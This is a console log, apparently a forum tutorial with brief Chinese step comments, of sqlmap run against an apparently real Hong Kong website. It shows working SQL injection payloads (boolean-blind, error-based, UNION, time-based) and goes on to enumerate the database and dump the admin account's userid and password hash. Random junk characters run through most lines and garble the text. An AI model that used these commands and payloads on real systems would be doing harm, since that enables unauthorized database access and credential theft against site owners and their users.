D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
% k& `4 o$ O3 J) hms "Mysql" --current-user /* 注解:获取当前用户名称
3 H+ u9 z9 O7 `& A1 Q sqlmap/0.9 - automatic SQL injection and database takeover tool$ N0 I- T, P7 |& i& ]3 r% x. v
http://sqlmap.sourceforge.net starting at: 16:53:54& ^" s, }4 O# f9 O! N0 r! g
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as9 H/ x; |( t6 c
session file
1 ?7 b! F5 F U- I) `% o* M' Z3 u[16:53:54] [INFO] resuming injection data from session file6 Z- M1 _7 J6 J1 H+ r) |
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file: r- F" M+ U/ B2 _
[16:53:54] [INFO] testing connection to the target url
& x# X/ E4 W; W0 T& r8 P! Ksqlmap identified the following injection points with a total of 0 HTTP(s) reque
9 l2 F; Q7 i3 @* B3 qsts:9 e+ [. X! w8 E( I6 I) R3 g
---0 L+ n( N6 q) _9 `& I, X
Place: GET
3 F5 M6 u( @3 t4 s! cParameter: id
( y! W* W) S) Z Type: boolean-based blind9 V' _( A. V+ H1 C* s% X
Title: AND boolean-based blind - WHERE or HAVING clause
" j+ \- b O4 C3 k Payload: id=276 AND 799=799& V; D# W" f! I, |
Type: error-based( i$ u0 f* r% g/ [) P# l, N4 D
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause$ _( j" W9 |. J( ]8 P$ h
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ O# I% u$ z. M1 ]
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! o* B0 L9 d+ J5 C+ b! W4 J- Z3 x
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 K5 u/ R3 L1 `) r# B; F( }0 A% `
Type: UNION query4 {6 S4 I/ f, V* B
Title: MySQL UNION query (NULL) - 1 to 10 columns
! Z7 g$ A4 V; T5 q4 ]* z Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR, F1 g* G! c& ]$ l: D4 C2 P
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( x+ c4 w0 Q, e. G6 ~
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#- j4 v2 u9 D" P9 o1 F. y9 F
Type: AND/OR time-based blind
9 a* [# H$ h3 G+ W Title: MySQL > 5.0.11 AND time-based blind
2 R6 j7 S, R# d Payload: id=276 AND SLEEP(5)
. c2 C. X# [9 v) u( ?+ W---
6 B: z# ?- Y) V/ T- T7 s[16:53:55] [INFO] the back-end DBMS is MySQL0 t' a& a1 r% B4 n+ m: K
web server operating system: Windows" M' A0 d% A2 c) h( A. C
web application technology: Apache 2.2.11, PHP 5.3.0
# _8 y4 m) O' @# ?- xback-end DBMS: MySQL 5.0
" a. X! u( e) E* J+ L% q[16:53:55] [INFO] fetching current user; a8 E5 _8 Y) z7 ~( [ F
current user: 'root@localhost' . ~$ x# M6 b# X/ D2 |
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou9 ?; U4 {" Q& E4 L
tput\www.wepost.com.hk' shutting down at: 16:53:58
+ ~1 d( e" G. |& b! ~
- Q: ^+ n( |) S: `2 JD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
5 L' M' ^$ ^6 ]4 b* Cms "Mysql" --current-db /*当前数据库
5 ]' w* [5 _% j4 n" Z, K& ` sqlmap/0.9 - automatic SQL injection and database takeover tool! k7 S& V' @3 @; s
http://sqlmap.sourceforge.net starting at: 16:54:16
9 h& D( E5 X; `4 z' H& u[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
( G* w# y9 @' p h+ [2 n& ^ session file
( f' C9 i9 ]6 p- [3 V[16:54:16] [INFO] resuming injection data from session file2 U; F0 Q' d4 j
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file7 Z% ~# i6 v$ f9 }/ ~1 H$ g
[16:54:16] [INFO] testing connection to the target url0 g- K3 Q( u a2 a
sqlmap identified the following injection points with a total of 0 HTTP(s) reque! h/ b# W7 a# ?5 y+ F
sts:2 R4 J( Q, F: R* x; M
---
4 p2 `0 r& y: ?. Z7 i/ ^Place: GET: L# E' H4 k0 q
Parameter: id
$ u" W4 Z; r# l" ^, b Type: boolean-based blind8 k l5 @& H$ [5 I) @/ }: ~& R
Title: AND boolean-based blind - WHERE or HAVING clause D; j, ^; B( y3 m, }
Payload: id=276 AND 799=799
- ]$ u X' L) I: g2 t+ { Type: error-based. E C: t% a) V5 O; ~$ P- X9 H
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause# q# a5 r" m# U* Q# |4 \
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; _1 R; |; z9 u3 G- T1 X
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
* _! F C! n9 y+ O# [. T),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
n4 I: H& R- M5 r Type: UNION query6 C) w6 v, c C5 Q8 I4 W6 J
Title: MySQL UNION query (NULL) - 1 to 10 columns' K7 D0 ~& ^8 S |' ?7 V6 @7 p
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR- [$ E9 w/ ]! U' ^+ t) w# G
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),/ i# c& i9 m: X0 `9 V# y% n$ V
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#- `) i0 A: r; N4 J* R9 T
Type: AND/OR time-based blind/ X5 g; M2 I0 A$ O; A1 o" A
Title: MySQL > 5.0.11 AND time-based blind" i7 s% E% k8 Y+ B" E; m1 Q
Payload: id=276 AND SLEEP(5)
4 C7 v( |. i+ j/ n---$ R" W2 K; }8 j) n g4 R
[16:54:17] [INFO] the back-end DBMS is MySQL
. ^5 a% o( r# o0 ~5 g( Z! `web server operating system: Windows
0 K( I) _( j0 pweb application technology: Apache 2.2.11, PHP 5.3.0( M' X `% ]; v$ R7 g; r/ C
back-end DBMS: MySQL 5.0, P& y( C6 d3 K: w. U7 y' n5 c
[16:54:17] [INFO] fetching current database" }$ e# U; r5 m" E( f9 {
current database: 'wepost'
) s+ E! _4 p2 U3 [6 a: D' G[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou; W; B* j. s- k, ?
tput\www.wepost.com.hk' shutting down at: 16:54:18
, q- z9 H/ t( \" u& ED:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 R# Y# c9 R1 j- ?/ F+ n( }% v" P
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
8 x) Q+ n {/ {( R sqlmap/0.9 - automatic SQL injection and database takeover tool/ @, ]' t7 q0 V; j
http://sqlmap.sourceforge.net starting at: 16:55:25
" o5 d+ Z8 ^3 r3 I& Y) \# \0 t[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
/ V+ g6 S9 D/ _ session file
+ B/ _/ K( b+ l8 T+ x1 z, L( Y5 L[16:55:25] [INFO] resuming injection data from session file
2 |5 Q0 s5 P* x" p$ l! b[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
5 T3 A! l% X+ _5 u[16:55:25] [INFO] testing connection to the target url
' O$ l3 I" U9 K: f' ?4 f Ysqlmap identified the following injection points with a total of 0 HTTP(s) reque
! M$ x0 k/ E0 U3 H- j ~sts:
3 \# g' J2 g7 _0 \( q p) I7 ]---& Z! c( R s. |; K4 Z
Place: GET
( M. i2 M1 Y6 jParameter: id
+ _ C2 n- d7 m/ F Type: boolean-based blind7 d' D2 z0 W& V( j" f0 ]
Title: AND boolean-based blind - WHERE or HAVING clause
% i* _6 `' m9 u7 c' w: `8 w* T Payload: id=276 AND 799=799
# ?" l3 H/ A0 | Type: error-based
0 ]" P/ V2 Q/ n" h. p Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
" x# P% K; }/ K0 C% m Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,2 Z( T' j ]- o5 ^3 \# n6 n& y
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
- h9 j3 c4 l/ m4 R" R) ^, n! _),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 V1 S f) X# ^) {
Type: UNION query
$ G8 ?5 b- R( W" z Title: MySQL UNION query (NULL) - 1 to 10 columns) o- P" r9 F2 C6 j" ]
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
; n" T. l2 g- k, J& X$ X% @8 `(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
+ ~- D& T( F6 ~( G$ O+ zCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
& i1 H& i6 O" d/ R$ ]1 B Type: AND/OR time-based blind
. P, }2 u+ T8 \, ?$ d B% ` Title: MySQL > 5.0.11 AND time-based blind
! P$ A$ X, h- L# s0 y; d2 @$ ` Payload: id=276 AND SLEEP(5). `/ N5 @9 n; j% v6 f* H# Q# U' W
---9 I/ o! }$ I C. ]- `
[16:55:26] [INFO] the back-end DBMS is MySQL
) d- h" t: L: Z* |) _' @. yweb server operating system: Windows
' s$ a" y) q7 hweb application technology: Apache 2.2.11, PHP 5.3.0
7 m: E0 H1 v$ C9 H8 I: k- Kback-end DBMS: MySQL 5.0
7 a: [& F" ^& Q- a[16:55:26] [INFO] fetching tables for database 'wepost'5 z2 x$ b& h, J
[16:55:27] [INFO] the SQL query used returns 6 entries5 k, W) F% Y' a W# y. ^
Database: wepost
q. C! J: w& M% m( C$ H4 I[6 tables]
3 E4 U, J- `& L$ T" `- k+-------------+
/ l5 @5 X4 L& R& {( L( A+ z| admin |% C- F6 r! V' _( d7 P2 L/ @
| article |
' a; J5 V& M2 `' T- S| contributor |3 g' [; I: S+ s! U
| idea |
7 C6 C# f1 }2 n( k" p1 d| image |
; ~! j3 C* c, J- T, Z E| issue |! o/ w; b( a5 d9 w3 L
+-------------+4 G$ C" w: {) k2 ^% D! \2 g$ ?; w
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou$ W! }! L, @, j0 U: F7 ?' t
tput\www.wepost.com.hk' shutting down at: 16:55:33
6 [- n- I) L% q. f
3 {' F2 \# Q# c5 ~D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# m- }& t; {- C. o
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
5 t$ c* g/ f; r- ]; F7 U+ [ K" h1 Z' ? sqlmap/0.9 - automatic SQL injection and database takeover tool& C0 p' K( o, H- A
http://sqlmap.sourceforge.net starting at: 16:56:06& l) {9 f3 m1 @, [* q
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
. [: R: f3 h( o; [' e) K) S- Csts:
, {" o, B+ ?; q) e- B# r---3 l. S+ y# D/ v9 G" a& W+ l- a
Place: GET8 o; G. I* B+ Y0 _* B' H/ R0 ~0 |: @
Parameter: id
$ m. T# {' h" }& k" R0 F Type: boolean-based blind3 k- u+ J2 H! e/ q
Title: AND boolean-based blind - WHERE or HAVING clause9 w. o9 T1 I2 F% ^+ T$ d, L
Payload: id=276 AND 799=799
" D' |% p) Z* y4 y& t+ f: X- E Type: error-based/ m7 M. ?( D6 Z0 @ P
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- o) H5 B- F, [ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ p" ]- }2 D3 F \( {
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
1 _. F- Q2 o$ F- K/ g5 S6 j* i),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
, M3 M3 O0 S3 J Type: UNION query
5 O; N, v0 `$ i/ d% Y3 T3 R5 K Title: MySQL UNION query (NULL) - 1 to 10 columns
' E* U6 T s& a/ Y Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
( h% I! u: [+ R2 a& ], i- `- v(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),. j' j- n. Q4 z: Z0 P" a. D
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
# M) m! M9 O% @6 \0 O7 p Type: AND/OR time-based blind
" w) \" t7 `6 I* V! M3 k$ \ Title: MySQL > 5.0.11 AND time-based blind! k( k! K5 y$ C# B
Payload: id=276 AND SLEEP(5)
# B: T- h2 Y$ s- m" i) r* x! _--- w2 @! g6 j4 B
web server operating system: Windows
2 B' d9 `. ^9 M, ^6 Jweb application technology: Apache 2.2.11, PHP 5.3.0
; y( h& j O. |# ]7 d) I) G9 {3 Vback-end DBMS: MySQL 5.0; O4 b- r: R& ]$ K6 D; ]% t7 P# z
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se2 c6 v- s9 d7 A. y" U
ssion': wepost, wepost
/ u( x- E2 b, WDatabase: wepost
- L2 `# p9 P$ P6 _* {: f6 eTable: admin
5 f/ _0 @% o* ^+ d8 G5 O& _4 H[4 columns]
: h0 u, x5 g% V+ F$ G% w2 H+----------+-------------+
; X1 u+ Z+ W8 O# ^) H4 B| Column | Type |! l }. F' S, U- ^6 _0 o! C0 j
+----------+-------------+
( Z+ E. F) q: v5 `7 C| id | int(11) |
7 S" _+ p( R2 q$ ~# [; w- {4 R0 x" y| password | varchar(32) |. F6 y" Z3 u. q" m5 T/ U4 w
| type | varchar(10) |3 n& o4 C- U _- w- j. H+ h
| userid | varchar(20) |
) g" T+ n% U% K ~4 Z+----------+-------------+
$ x+ v" k! Z' i# G shutting down at: 16:56:19
! U6 A0 @- I6 `/ b/ h2 i
/ [4 q' o9 _- F5 h9 LD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 ?* c+ O4 D7 k1 h% L1 L- b
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
7 [, N" L) O5 O/ ^( {/ z sqlmap/0.9 - automatic SQL injection and database takeover tool
+ z( o2 ^* k w http://sqlmap.sourceforge.net starting at: 16:57:14
3 _3 E$ G; U3 ] \& ^2 psqlmap identified the following injection points with a total of 0 HTTP(s) reque
8 d' e; R- }4 f4 g! W! } bsts:; a' W8 A9 u9 ?5 @
---1 K( _0 w4 B3 a7 w! `: M
Place: GET& n1 k# S/ T, K8 i( X M8 T5 Q- h
Parameter: id O$ X7 s4 X) A a. G$ c8 Z2 O
Type: boolean-based blind
, v* ?3 Q- Q( {. K @: h" S Title: AND boolean-based blind - WHERE or HAVING clause; @) I0 }7 {% y$ ^, l
Payload: id=276 AND 799=7999 Y1 ?& M3 G# z8 B$ J3 r
Type: error-based
) k, }% }' C: N9 c Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause z4 d9 U9 P# @; S" m
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
3 E8 E/ T9 {# G" M4 D! U# d120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
) w* \: f+ S' w),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)9 r+ @0 v+ `4 _2 h& @
Type: UNION query
9 ^$ }8 ^# i6 Q) [0 p Title: MySQL UNION query (NULL) - 1 to 10 columns
; O% [' O$ I& M9 C; j) V$ X Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
% {+ v8 t# B& B- F$ ](58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
& [" [1 [- }1 [0 ^1 C6 @' j0 YCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#7 J- c: k1 H; y% b8 ^& l
Type: AND/OR time-based blind
! @0 k+ q y; C3 r5 c7 A Title: MySQL > 5.0.11 AND time-based blind/ R- \' y) C( y l% @! ], R# g
Payload: id=276 AND SLEEP(5)
9 q& Q: \: h6 A% q$ N- E# t* k---
5 ^! s6 \% p) z& C2 g, u& [9 G1 N' [web server operating system: Windows& s$ O& Z: o$ Z: G; ]- y
web application technology: Apache 2.2.11, PHP 5.3.0
a6 T3 D5 g- v+ x6 r* Sback-end DBMS: MySQL 5.08 L- V( u9 d# g2 K3 `0 ~! W1 K# C; X
recognized possible password hash values. do you want to use dictionary attack o% \+ `$ W4 k+ N* x2 T, ^6 ^
n retrieved table items? [Y/n/q] y
+ g& s* E; G8 X V# X7 R9 Y/ ewhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt] b5 V' V5 y' x: ]3 N0 r
do you want to use common password suffixes? (slow!) [y/N] y
! d/ K: l5 z) qDatabase: wepost* A+ I5 }- W* D' \) C# c- |
Table: admin
: m5 K* z6 G# G# s+ e: w) R9 E[1 entry]
8 t( ~+ a/ p% j2 n+ B4 B0 v+----------------------------------+------------+
4 ?2 I9 P, A/ N7 \; p/ x2 X| password | userid |0 ~' [! W) M/ k
+----------------------------------+------------+$ Q' }5 Z7 W5 ?5 C8 }; _
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |# X. @6 p0 D4 X7 F! L8 U. E
+----------------------------------+------------+
; Y( Y3 P: a- \4 c0 _ shutting down at: 16:58:14/ F0 Y/ f$ ?; T5 q# ?; N
9 n$ f9 ?& Q. @- A1 W, c
D:\Python27\sqlmap> |